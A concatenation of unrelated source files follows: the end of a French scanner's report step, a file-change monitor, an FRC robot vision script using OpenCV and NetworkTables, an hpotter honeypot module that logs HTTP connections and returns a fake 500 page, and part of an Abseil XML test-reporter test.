print "\tÀ des fins de débogage, vous pouvez afficher la sortie complète générée par tous les outils nommés"+bcolors.TBLUE+"`MS-Debug-ScLog`"+bcolors.ENDC+" sous le même répertoire."
print bcolors.BG_ENDL_TXT+"[ La phase de génération de rapports est terminée. ]"+bcolors.ENDC
os.system('setterm -cursor on')
os.system('rm te* > /dev/null 2>&1') # Effacement des fichiers d'analyse précédents
|
watcher.py
|
import time
import threading
import logging
class Monitor(object):
def __init__(self):
self.handlers = {}
def file_changed(self, filename):
logging.getLogger(__name__).info('File changed %s', filename)
for v in self.handlers[filename]:
v[0](filename, *v[1:])
def monitor(self, filename, handler, *args):
if filename not in self.handlers:
self._monitor(filename)
self.handlers.setdefault(filename, set()).add((handler,) + args)
class DummyMonitor(Monitor):
def __init__(self):
Monitor.__init__(self)
self.files = set()
def _monitor(self, filename):
self.files.add(filename)
def boo(self):
map(self.file_changed, self.files)
class FallbackMonitor(Monitor):
def __init__(self):
Monitor.__init__(self)
self.files = {}
self.timeout = 5
def start(self):
t = threading.Thread(target=self.watch_for_changes)
t.daemon = True
t.start()
def _monitor(self, filename):
from os.path import getmtime
if filename not in self.files:
logging.getLogger(__name__).info('Monitor changes for %s', filename)
self.files[filename] = getmtime(filename)
def watch_for_changes(self):
from os.path import getmtime
while True:
for f, mtime in self.files.iteritems():
new_mtime = getmtime(f)
if new_mtime != mtime:
self.file_changed(f)
self.files[f] = new_mtime
time.sleep(self.timeout)
def get_monitor():
return FallbackMonitor()
|
vision.py
|
#!/usr/bin/env python3
# R-pi computer vision
# Credit to Screaming Chickens 3997
# This is meant to be used in conjuction with WPILib Raspberry Pi image: https://github.com/wpilibsuite/FRCVision-pi-gen
import json
import time
import sys
from threading import Thread
from cscore import CameraServer, VideoSource
from networktables import NetworkTablesInstance
import cv2
import numpy as np
from networktables import NetworkTables
import math
########### SET RESOLUTION TO 256x144 !!!! ############
# import the necessary packages
import datetime
#Class to examine Frames per second of camera stream. Currently not used.
class FPS:
def __init__(self):
# store the start time, end time, and total number of frames
# that were examined between the start and end intervals
self._start = None
self._end = None
self._numFrames = 0
def start(self):
# start the timer
self._start = datetime.datetime.now()
return self
def stop(self):
# stop the timer
self._end = datetime.datetime.now()
def update(self):
# increment the total number of frames examined during the
# start and end intervals
self._numFrames += 1
def elapsed(self):
# return the total number of seconds between the start and
# end interval
return (self._end - self._start).total_seconds()
def fps(self):
# compute the (approximate) frames per second
return self._numFrames / self.elapsed()
# class that runs separate thread for showing video,
class VideoShow:
"""
Class that continuously shows a frame using a dedicated thread.
"""
def __init__(self, imgWidth, imgHeight, cameraServer, frame=None, name='stream'):
self.outputStream = cameraServer.putVideo(name, imgWidth, imgHeight)
self.frame = frame
self.stopped = False
def start(self):
Thread(target=self.show, args=()).start()
return self
def show(self):
while not self.stopped:
self.outputStream.putFrame(self.frame)
def stop(self):
self.stopped = True
def notifyError(self, error):
self.outputStream.notifyError(error)
class WebcamVideoStream:
def __init__(self, camera, cameraServer, frameWidth, frameHeight, name="WebcamVideoStream"):
# initialize the video camera stream and read the first frame
# from the stream
#Automatically sets exposure to 0 to track tape
self.webcam = camera
self.webcam.setExposureManual(0)
#Some booleans so that we don't keep setting exposure over and over to the same value
self.autoExpose = False
self.prevValue = self.autoExpose
#Make a blank image to write on
self.img = np.zeros(shape=(frameWidth, frameHeight, 3), dtype=np.uint8)
#Gets the video
self.stream = cameraServer.getVideo(camera = camera)
(self.timestamp, self.img) = self.stream.grabFrame(self.img)
# initialize the thread name
self.name = name
# initialize the variable used to indicate if the thread should
# be stopped
self.stopped = False
def start(self):
# start the thread to read frames from the video stream
t = Thread(target=self.update, name=self.name, args=())
t.daemon = True
t.start()
return self
def update(self):
# keep looping infinitely until the thread is stopped
while True:
# if the thread indicator variable is set, stop the thread
if self.stopped:
return
#Boolean logic we don't keep setting exposure over and over to the same value
if self.autoExpose:
self.webcam.setExposureAuto()
else:
self.webcam.setExposureManual(0)
#gets the image and timestamp from cameraserver
(self.timestamp, self.img) = self.stream.grabFrame(self.img)
def read(self):
# return the frame most recently read
return self.timestamp, self.img
def stop(self):
# indicate that the thread should be stopped
self.stopped = True
def getError(self):
return self.stream.getError()
###################### PROCESSING OPENCV ################################
#Angles in radians
#image size ratioed to 16:9
image_width = 256
image_height = 144
#Lifecam 3000 from datasheet
#Datasheet: https://dl2jx7zfbtwvr.cloudfront.net/specsheets/WEBC1010.pdf
diagonalView = math.radians(68.5)
#16:9 aspect ratio
horizontalAspect = 16
verticalAspect = 9
#Reasons for using diagonal aspect is to calculate horizontal field of view.
diagonalAspect = math.hypot(horizontalAspect, verticalAspect)
#Calculations: http://vrguy.blogspot.com/2013/04/converting-diagonal-field-of-view-and.html
horizontalView = math.atan(math.tan(diagonalView/2) * (horizontalAspect / diagonalAspect)) * 2
verticalView = math.atan(math.tan(diagonalView/2) * (verticalAspect / diagonalAspect)) * 2
#Focal Length calculations: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_165
H_FOCAL_LENGTH = image_width / (2*math.tan((horizontalView/2)))
V_FOCAL_LENGTH = image_height / (2*math.tan((verticalView/2)))
#blurs have to be odd
green_blur = 7
orange_blur = 27
# define range of green of retroreflective tape in HSV
lower_green = np.array([0,220,25])
upper_green = np.array([101, 255, 255])
#define range of orange from cargo ball in HSV
lower_orange = np.array([0,193,92])
upper_orange = np.array([23, 255, 255])
#Flip image if camera mounted upside down
def flipImage(frame):
return cv2.flip( frame, -1 )
#Blurs frame
def blurImg(frame, blur_radius):
img = frame.copy()
blur = cv2.blur(img,(blur_radius,blur_radius))
return blur
# Masks the video based on a range of hsv colors
# Takes in a frame, range of color, and a blurred frame, returns a masked frame
def threshold_video(lower_color, upper_color, blur):
# Convert BGR to HSV
hsv = cv2.cvtColor(blur, cv2.COLOR_BGR2HSV)
# hold the HSV image to get only red colors
mask = cv2.inRange(hsv, lower_color, upper_color)
# Returns the masked imageBlurs video to smooth out image
return mask
# Finds the tape targets from the masked image and displays them on original stream + network tales
def findTargets(frame, mask):
# Finds contours
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_KCOS)
# Take each frame
# Gets the shape of video
screenHeight, screenWidth, _ = frame.shape
# Gets center of height and width
centerX = (screenWidth / 2) - .5
centerY = (screenHeight / 2) - .5
# Copies frame and stores it in image
image = frame.copy()
# Processes the contours, takes in (contours, output_image, (centerOfImage)
if len(contours) != 0:
image = findTape(contours, image, centerX, centerY)
else:
# pushes that it deosn't see vision target to network tables
networkTable.putBoolean("tapeDetected", False)
# Shows the contours overlayed on the original video
return image
# Finds the balls from the masked image and displays them on original stream + network tables
def findCargo(frame, mask):
# Finds contours
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_TC89_KCOS)
# Take each frame
# Gets the shape of video
screenHeight, screenWidth, _ = frame.shape
# Gets center of height and width
centerX = (screenWidth / 2) - .5
centerY = (screenHeight / 2) - .5
# Copies frame and stores it in image
image = frame.copy()
# Processes the contours, takes in (contours, output_image, (centerOfImage)
if len(contours) != 0:
image = findBall(contours, image, centerX, centerY)
else:
# pushes that it doesn't see cargo to network tables
networkTable.putBoolean("cargoDetected", False)
# Shows the contours overlayed on the original video
return image
# Draws Contours and finds center and yaw of orange ball
# centerX is center x coordinate of image
# centerY is center y coordinate of image
def findBall(contours, image, centerX, centerY):
screenHeight, screenWidth, channels = image.shape;
#Seen vision targets (correct angle, adjacent to each other)
cargo = []
if len(contours) > 0:
#Sort contours by area size (biggest to smallest)
cntsSorted = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
biggestCargo = []
for cnt in cntsSorted:
x, y, w, h = cv2.boundingRect(cnt)
aspect_ratio = float(w) / h
# Get moments of contour; mainly for centroid
M = cv2.moments(cnt)
# Get convex hull (bounding polygon on contour)
hull = cv2.convexHull(cnt)
# Calculate Contour area
cntArea = cv2.contourArea(cnt)
# Filters contours based off of size
if (checkBall(cntArea, aspect_ratio)):
### MOSTLY DRAWING CODE, BUT CALCULATES IMPORTANT INFO ###
# Gets the centeroids of contour
if M["m00"] != 0:
cx = int(M["m10"] / M["m00"])
cy = int(M["m01"] / M["m00"])
else:
cx, cy = 0, 0
if(len(biggestCargo) < 3):
##### DRAWS CONTOUR######
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Draws rotated rectangle
cv2.drawContours(image, [box], 0, (23, 184, 80), 3)
# Draws a vertical white line passing through center of contour
cv2.line(image, (cx, screenHeight), (cx, 0), (255, 255, 255))
# Draws a white circle at center of contour
cv2.circle(image, (cx, cy), 6, (255, 255, 255))
# Draws the contours
cv2.drawContours(image, [cnt], 0, (23, 184, 80), 1)
# Gets the (x, y) and radius of the enclosing circle of contour
(x, y), radius = cv2.minEnclosingCircle(cnt)
# Rounds center of enclosing circle
center = (int(x), int(y))
# Rounds radius of enclosning circle
radius = int(radius)
# Makes bounding rectangle of contour
rx, ry, rw, rh = cv2.boundingRect(cnt)
# Draws countour of bounding rectangle and enclosing circle in green
cv2.rectangle(image, (rx, ry), (rx + rw, ry + rh), (23, 184, 80), 1)
cv2.circle(image, center, radius, (23, 184, 80), 1)
# Appends important info to array
if not biggestCargo:
biggestCargo.append([cx, cy])
elif [cx, cy, cnt] not in biggestCargo:
biggestCargo.append([cx, cy])
# Check if there are cargo seen
if (len(biggestCargo) > 0):
#pushes that it sees cargo to network tables
networkTable.putBoolean("cargoDetected", True)
# Sorts targets based on x coords to break any angle tie
biggestCargo.sort(key=lambda x: math.fabs(x[0]))
closestCargo = min(biggestCargo, key=lambda x: (math.fabs(x[0] - centerX)))
xCoord = closestCargo[0]
finalTarget = calculateYaw(xCoord, centerX, H_FOCAL_LENGTH)
print("Yaw: " + str(finalTarget))
# Puts the yaw on screen
# Draws yaw of target + line where center of target is
cv2.putText(image, "Yaw: " + str(finalTarget), (40, 40), cv2.FONT_HERSHEY_COMPLEX, .6,
(255, 255, 255))
cv2.line(image, (int(xCoord), screenHeight), (int(xCoord), 0), (255, 0, 0), 2)
currentAngleError = finalTarget
#pushes cargo angle to network tables
networkTable.putNumber("cargoYaw", currentAngleError)
else:
#pushes that it doesn't see cargo to network tables
networkTable.putBoolean("cargoDetected", False)
cv2.line(image, (int(centerX), screenHeight), (int(centerX), 0), (255, 255, 255), 2)
return image
# Draws Contours and finds center and yaw of vision targets
# centerX is center x coordinate of image
# centerY is center y coordinate of image
def findTape(contours, image, centerX, centerY):
screenHeight, screenWidth, channels = image.shape;
#Seen vision targets (correct angle, adjacent to each other)
targets = []
if len(contours) >= 2:
#Sort contours by area size (biggest to smallest)
cntsSorted = sorted(contours, key=lambda x: cv2.contourArea(x), reverse=True)
biggestCnts = []
for cnt in cntsSorted:
# Get moments of contour; mainly for centroid
M = cv2.moments(cnt)
# Get convex hull (bounding polygon on contour)
hull = cv2.convexHull(cnt)
# Calculate Contour area
cntArea = cv2.contourArea(cnt)
# calculate area of convex hull
hullArea = cv2.contourArea(hull)
# Filters contours based off of size
if (checkContours(cntArea, hullArea)):
### MOSTLY DRAWING CODE, BUT CALCULATES IMPORTANT INFO ###
# Gets the centeroids of contour
if M["m00"] != 0:
cx = int(M["m10"] / M["m00"])
cy = int(M["m01"] / M["m00"])
else:
cx, cy = 0, 0
if(len(biggestCnts) < 13):
#### CALCULATES ROTATION OF CONTOUR BY FITTING ELLIPSE ##########
rotation = getEllipseRotation(image, cnt)
# Calculates yaw of contour (horizontal position in degrees)
yaw = calculateYaw(cx, centerX, H_FOCAL_LENGTH)
# Calculates yaw of contour (horizontal position in degrees)
pitch = calculatePitch(cy, centerY, V_FOCAL_LENGTH)
##### DRAWS CONTOUR######
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Draws rotated rectangle
cv2.drawContours(image, [box], 0, (23, 184, 80), 3)
# Calculates yaw of contour (horizontal position in degrees)
yaw = calculateYaw(cx, centerX, H_FOCAL_LENGTH)
# Calculates yaw of contour (horizontal position in degrees)
pitch = calculatePitch(cy, centerY, V_FOCAL_LENGTH)
# Draws a vertical white line passing through center of contour
cv2.line(image, (cx, screenHeight), (cx, 0), (255, 255, 255))
# Draws a white circle at center of contour
cv2.circle(image, (cx, cy), 6, (255, 255, 255))
# Draws the contours
cv2.drawContours(image, [cnt], 0, (23, 184, 80), 1)
# Gets the (x, y) and radius of the enclosing circle of contour
(x, y), radius = cv2.minEnclosingCircle(cnt)
# Rounds center of enclosing circle
center = (int(x), int(y))
# Rounds radius of enclosning circle
radius = int(radius)
# Makes bounding rectangle of contour
rx, ry, rw, rh = cv2.boundingRect(cnt)
boundingRect = cv2.boundingRect(cnt)
# Draws countour of bounding rectangle and enclosing circle in green
cv2.rectangle(image, (rx, ry), (rx + rw, ry + rh), (23, 184, 80), 1)
cv2.circle(image, center, radius, (23, 184, 80), 1)
# Appends important info to array
if not biggestCnts:
biggestCnts.append([cx, cy, rotation])
elif [cx, cy, rotation] not in biggestCnts:
biggestCnts.append([cx, cy, rotation])
# Sorts array based on coordinates (leftmost to rightmost) to make sure contours are adjacent
biggestCnts = sorted(biggestCnts, key=lambda x: x[0])
# Target Checking
for i in range(len(biggestCnts) - 1):
#Rotation of two adjacent contours
tilt1 = biggestCnts[i][2]
tilt2 = biggestCnts[i + 1][2]
#x coords of contours
cx1 = biggestCnts[i][0]
cx2 = biggestCnts[i + 1][0]
cy1 = biggestCnts[i][1]
cy2 = biggestCnts[i + 1][1]
# If contour angles are opposite
if (np.sign(tilt1) != np.sign(tilt2)):
centerOfTarget = math.floor((cx1 + cx2) / 2)
#ellipse negative tilt means rotated to right
#Note: if using rotated rect (min area rectangle)
# negative tilt means rotated to left
# If left contour rotation is tilted to the left then skip iteration
if (tilt1 > 0):
if (cx1 < cx2):
continue
# If left contour rotation is tilted to the left then skip iteration
if (tilt2 > 0):
if (cx2 < cx1):
continue
#Angle from center of camera to target (what you should pass into gyro)
yawToTarget = calculateYaw(centerOfTarget, centerX, H_FOCAL_LENGTH)
#Make sure no duplicates, then append
if not targets:
targets.append([centerOfTarget, yawToTarget])
elif [centerOfTarget, yawToTarget] not in targets:
targets.append([centerOfTarget, yawToTarget])
#Check if there are targets seen
if (len(targets) > 0):
# pushes that it sees vision target to network tables
networkTable.putBoolean("tapeDetected", True)
#Sorts targets based on x coords to break any angle tie
targets.sort(key=lambda x: math.fabs(x[0]))
finalTarget = min(targets, key=lambda x: math.fabs(x[1]))
# Puts the yaw on screen
#Draws yaw of target + line where center of target is
cv2.putText(image, "Yaw: " + str(finalTarget[1]), (40, 40), cv2.FONT_HERSHEY_COMPLEX, .6,
(255, 255, 255))
cv2.line(image, (finalTarget[0], screenHeight), (finalTarget[0], 0), (255, 0, 0), 2)
currentAngleError = finalTarget[1]
# pushes vision target angle to network tables
networkTable.putNumber("tapeYaw", currentAngleError)
else:
# pushes that it deosn't see vision target to network tables
networkTable.putBoolean("tapeDetected", False)
cv2.line(image, (round(centerX), screenHeight), (round(centerX), 0), (255, 255, 255), 2)
return image
# Checks if tape contours are worthy based off of contour area and (not currently) hull area
def checkContours(cntSize, hullSize):
return cntSize > (image_width / 6)
# Checks if ball contours are worthy based off of contour area and (not currently) hull area
def checkBall(cntSize, cntAspectRatio):
return (cntSize > (image_width / 2)) and (round(cntAspectRatio) == 1)
#Forgot how exactly it works, but it works!
def translateRotation(rotation, width, height):
if (width < height):
rotation = -1 * (rotation - 90)
if (rotation > 90):
rotation = -1 * (rotation - 180)
rotation *= -1
return round(rotation)
def calculateDistance(heightOfCamera, heightOfTarget, pitch):
heightOfTargetFromCamera = heightOfTarget - heightOfCamera
# Uses trig and pitch to find distance to target
'''
d = distance
h = height between camera and target
a = angle = pitch
tan a = h/d (opposite over adjacent)
d = h / tan a
.
/|
/ |
/ |h
/a |
camera -----
d
'''
distance = math.fabs(heightOfTargetFromCamera / math.tan(math.radians(pitch)))
return distance
# Uses trig and focal length of camera to find yaw.
# Link to further explanation: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_298
def calculateYaw(pixelX, centerX, hFocalLength):
yaw = math.degrees(math.atan((pixelX - centerX) / hFocalLength))
return round(yaw)
# Link to further explanation: https://docs.google.com/presentation/d/1ediRsI-oR3-kwawFJZ34_ZTlQS2SDBLjZasjzZ-eXbQ/pub?start=false&loop=false&slide=id.g12c083cffa_0_298
def calculatePitch(pixelY, centerY, vFocalLength):
pitch = math.degrees(math.atan((pixelY - centerY) / vFocalLength))
# Just stopped working have to do this:
pitch *= -1
return round(pitch)
def getEllipseRotation(image, cnt):
try:
# Gets rotated bounding ellipse of contour
ellipse = cv2.fitEllipse(cnt)
centerE = ellipse[0]
# Gets rotation of ellipse; same as rotation of contour
rotation = ellipse[2]
# Gets width and height of rotated ellipse
widthE = ellipse[1][0]
heightE = ellipse[1][1]
# Maps rotation to (-90 to 90). Makes it easier to tell direction of slant
rotation = translateRotation(rotation, widthE, heightE)
cv2.ellipse(image, ellipse, (23, 184, 80), 3)
return rotation
except:
# Gets rotated bounding rectangle of contour
rect = cv2.minAreaRect(cnt)
# Creates box around that rectangle
box = cv2.boxPoints(rect)
# Not exactly sure
box = np.int0(box)
# Gets center of rotated rectangle
center = rect[0]
# Gets rotation of rectangle; same as rotation of contour
rotation = rect[2]
# Gets width and height of rotated rectangle
width = rect[1][0]
height = rect[1][1]
# Maps rotation to (-90 to 90). Makes it easier to tell direction of slant
rotation = translateRotation(rotation, width, height)
return rotation
#################### FRC VISION PI Image Specific #############
configFile = "/boot/frc.json"
class CameraConfig: pass
team = None
server = False
cameraConfigs = []
"""Report parse error."""
def parseError(str):
print("config error in '" + configFile + "': " + str, file=sys.stderr)
"""Read single camera configuration."""
def readCameraConfig(config):
cam = CameraConfig()
# name
try:
cam.name = config["name"]
except KeyError:
parseError("could not read camera name")
return False
# path
try:
cam.path = config["path"]
except KeyError:
parseError("camera '{}': could not read path".format(cam.name))
return False
cam.config = config
cameraConfigs.append(cam)
return True
"""Read configuration file."""
def readConfig():
global team
global server
# parse file
try:
try:
with open(configFile, "rt") as f:
j = json.load(f)
except:
with open("./frc.json", "rt") as f:
j = json.load(f)
except OSError as err:
print("could not open '{}': {}".format(configFile, err), file=sys.stderr)
return False
# top level must be an object
if not isinstance(j, dict):
parseError("must be JSON object")
return False
# team number
try:
team = j["team"]
except KeyError:
parseError("could not read team number")
return False
# ntmode (optional)
if "ntmode" in j:
str = j["ntmode"]
if str.lower() == "client":
server = False
elif str.lower() == "server":
server = True
else:
parseError("could not understand ntmode value '{}'".format(str))
# cameras
try:
cameras = j["cameras"]
except KeyError:
parseError("could not read cameras")
return False
for camera in cameras:
if not readCameraConfig(camera):
return False
return True
"""Start running the camera."""
def startCamera(config):
print("Starting camera '{}' on {}".format(config.name, config.path))
cs = CameraServer.getInstance()
camera = cs.startAutomaticCapture(name=config.name, path=config.path)
camera.setConfigJson(json.dumps(config.config))
return cs, camera
if __name__ == "__main__":
if len(sys.argv) >= 2:
configFile = sys.argv[1]
# read configuration
if not readConfig():
sys.exit(1)
# start NetworkTables
ntinst = NetworkTablesInstance.getDefault()
#Name of network table - this is how it communicates with robot. IMPORTANT
networkTable = NetworkTables.getTable('ChickenVision')
if server:
print("Setting up NetworkTables server")
ntinst.startServer()
else:
print("Setting up NetworkTables client for team {}".format(team))
ntinst.startClientTeam(team)
# start cameras
cameras = []
streams = []
for cameraConfig in cameraConfigs:
cs, cameraCapture = startCamera(cameraConfig)
streams.append(cs)
cameras.append(cameraCapture)
#Get the first camera
webcam = cameras[0]
cameraServer = streams[0]
#Start thread reading camera
cap = WebcamVideoStream(webcam, cameraServer, image_width, image_height).start()
# (optional) Setup a CvSource. This will send images back to the Dashboard
# Allocating new images is very expensive, always try to preallocate
img = np.zeros(shape=(image_height, image_width, 3), dtype=np.uint8)
#Start thread outputing stream
streamViewer = VideoShow(image_width,image_height, cameraServer, frame=img, name="ChickenVision").start()
#cap.autoExpose=True;
tape = False
fps = FPS().start()
#TOTAL_FRAMES = 200;
# loop forever
while True:
# Tell the CvSink to grab a frame from the camera and put it
# in the source image. If there is an error notify the output.
timestamp, img = cap.read()
#Uncomment if camera is mounted upside down
frame = flipImage(img)
#Comment out if camera is mounted upside down
#frame = img
if timestamp == 0:
# Send the output the error.
streamViewer.notifyError(cap.getError());
# skip the rest of the current iteration
continue
#Checks if you just want camera for driver (No processing), False by default
if(networkTable.getBoolean("Driver", False)):
cap.autoExpose = True
processed = frame
else:
# Checks if you just want camera for Tape processing , False by default
if(networkTable.getBoolean("Tape", True)):
#Lowers exposure to 0
cap.autoExpose = False
boxBlur = blurImg(frame, green_blur)
threshold = threshold_video(lower_green, upper_green, boxBlur)
processed = findTargets(frame, threshold)
else:
# Checks if you just want camera for Cargo processing, by dent of everything else being false, true by default
cap.autoExpose = True
boxBlur = blurImg(frame, orange_blur)
threshold = threshold_video(lower_orange, upper_orange, boxBlur)
processed = findCargo(frame, threshold)
#Puts timestamp of camera on netowrk tables
networkTable.putNumber("VideoTimestamp", timestamp)
streamViewer.frame = processed
# update the FPS counter
fps.update()
#Flushes camera values to reduce latency
ntinst.flush()
#Doesn't do anything at the moment. You can easily get this working by indenting these three lines
# and setting while loop to: while fps._numFrames < TOTAL_FRAMES
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
|
http500.py
|
import socketserver
import threading
from datetime import datetime
from hpotter.env import http500_server, write_db
from hpotter import tables
# remember to put name in __init__.py
Header = '''
HTTP/1.0 500 Internal Server Error
Date: {now}
Server: Apache/2.4.6 (Red Hat Enterprise Linux) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
Last-Modified: {now}
Cache-Control: max-age=0
Content-Type: text/html; charset=UTF-8
<html>
<head>
<title>500 Internal Server Error</title>
</head>
<body>
500 Internal Server Error
</body>
</html>
'''.format(now=datetime.now())
class HTTPHandler(socketserver.BaseRequestHandler):
def handle(self):
connection = tables.Connections(
sourceIP=self.client_address[0],
sourcePort=self.client_address[1],
destIP=self.server.server_address[0],
destPort=self.server.server_address[1],
proto=tables.TCP)
write_db(connection)
self.request.settimeout(30)
try:
data = self.request.recv(4096).decode("utf-8")
except:
return
http = tables.HTTPCommands(request=data, connection=connection)
write_db(http)
self.request.sendall(Header.encode('utf-8'))
class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer): pass
def start_server():
http_handler = HTTPHandler
http500_server = HTTPServer(('0.0.0.0', 80), HTTPHandler)
threading.Thread(target=http500_server.serve_forever).start()
def stop_server():
if http500_server:
http500_server.shutdown()
|
xml_reporter_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import os
import re
import subprocess
import sys
import tempfile
import threading
import time
import unittest
from xml.etree import ElementTree
from xml.parsers import expat
from absl import logging
from absl.testing import _bazelize_command
from absl.testing import absltest
from absl.testing import parameterized
from absl.testing import xml_reporter
from absl.third_party import unittest3_backport
import mock
import six
class StringIOWriteLn(six.StringIO):
def writeln(self, line):
self.write(line + '\n')
class MockTest(absltest.TestCase):
failureException = AssertionError
def __init__(self, name):
super(MockTest, self).__init__()
self.name = name
def id(self):
return self.name
def runTest(self):
return
def shortDescription(self):
return "This is this test's description."
# str(exception_type) is different between Python 2 and 3.
def xml_escaped_exception_type(exception_type):
return xml_reporter._escape_xml_attr(str(exception_type))
OUTPUT_STRING = '\n'.join([
r'<\?xml version="1.0"\?>',
'<testsuites name="" tests="%(tests)d" failures="%(failures)d"'
' errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
'<testsuite name="%(suite_name)s" tests="%(tests)d"'
' failures="%(failures)d" errors="%(errors)d" time="%(run_time).1f" timestamp="%(start_time)s">',
' <testcase name="%(test_name)s" status="%(status)s" result="%(result)s"'
' time="%(run_time).1f" classname="%(classname)s"'
' timestamp="%(start_time)s">%(message)s', ' </testcase>', '</testsuite>',
'</testsuites>'
])
FAILURE_MESSAGE = r"""
<failure message="e" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_failure
raise AssertionError\(\'e\'\)
AssertionError: e
\]\]></failure>""".format(xml_escaped_exception_type(AssertionError))
ERROR_MESSAGE = r"""
<error message="invalid literal for int\(\) with base 10: (')?a(')?" type="{}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_sample_error
int\('a'\)
ValueError: invalid literal for int\(\) with base 10: '?a'?
\]\]></error>""".format(xml_escaped_exception_type(ValueError))
UNICODE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_unicode_sample_failure
raise AssertionError\(u'\\xe9'\)
AssertionError: {0}
\]\]></%s>""".format(
r'\\xe9' if six.PY2 else r'\xe9',
xml_escaped_exception_type(AssertionError))
NEWLINE_MESSAGE = r"""
<%s message="{0}" type="{1}"><!\[CDATA\[Traceback \(most recent call last\):
File ".*xml_reporter_test\.py", line \d+, in get_newline_message_sample_failure
raise AssertionError\(\'{2}'\)
AssertionError: {3}
\]\]></%s>""".format(
'new
line',
xml_escaped_exception_type(AssertionError),
r'new\\nline',
'new\nline')
UNEXPECTED_SUCCESS_MESSAGE = '\n'.join([
'',
r' <error message="" type=""><!\[CDATA\[Test case '
r'__main__.MockTest.unexpectedly_passing_test should have failed, '
r'but passed.\]\]></error>'])
UNICODE_ERROR_MESSAGE = UNICODE_MESSAGE % ('error', 'error')
NEWLINE_ERROR_MESSAGE = NEWLINE_MESSAGE % ('error', 'error')
class TextAndXMLTestResultTest(absltest.TestCase):
def setUp(self):
self.stream = StringIOWriteLn()
self.xml_stream = six.StringIO()
def _make_result(self, times):
timer = mock.Mock()
timer.side_effect = times
return xml_reporter._TextAndXMLTestResult(self.xml_stream, self.stream,
'foo', 0, timer)
def _assert_match(self, regex, output):
self.assertRegex(output, regex)
def _assert_valid_xml(self, xml_output):
try:
expat.ParserCreate().Parse(xml_output)
except expat.ExpatError as e:
raise AssertionError('Bad XML output: {}\n{}'.format(e, xml_output))
def _simulate_error_test(self, test, result):
result.startTest(test)
result.addError(test, self.get_sample_error())
result.stopTest(test)
def _simulate_failing_test(self, test, result):
result.startTest(test)
result.addFailure(test, self.get_sample_failure())
result.stopTest(test)
def _simulate_passing_test(self, test, result):
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
def test_with_passing_test(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
result.startTestRun()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
'passing_test',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', None)
else:
subtest = unittest3_backport.case._SubTest(test, 'msg', None)
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'passing_test \[msg\]',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
'completed',
'attributes':
'',
'message':
''
}
self._assert_match(expected_re, self.xml_stream.getvalue())
def test_with_passing_subtest_with_dots_in_parameter_name(self):
start_time = 0
end_time = 2
result = self._make_result((start_time, start_time, end_time, end_time))
test = MockTest('__main__.MockTest.passing_test')
if six.PY3:
subtest = unittest.case._SubTest(test, 'msg', {'case': 'a.b.c'})
else:
# In Python 3 subTest uses a ChainMap to hold the parameters, but ChainMap
# does not exist in Python 2, so a list of dict is used to simulate the
# behavior of a ChainMap. This is why a list is provided as a parameter
# here.
subtest = unittest3_backport.case._SubTest(test, 'msg',
[{'case': 'a.b.c'}])
result.startTestRun()
result.startTest(test)
result.addSubTest(test, subtest, None)
result.stopTestRun()
result.printErrors()
run_time = end_time - start_time
expected_re = OUTPUT_STRING % {
'suite_name':
'MockTest',
'tests':
1,
'failures':
0,
'errors':
0,
'run_time':
run_time,
'start_time':
datetime.datetime.utcfromtimestamp(start_time).isoformat(),
'test_name':
r'passing_test \[msg\] \(case='a.b.c'\)',
'classname':
'__main__.MockTest',
'status':
'run',
'result':
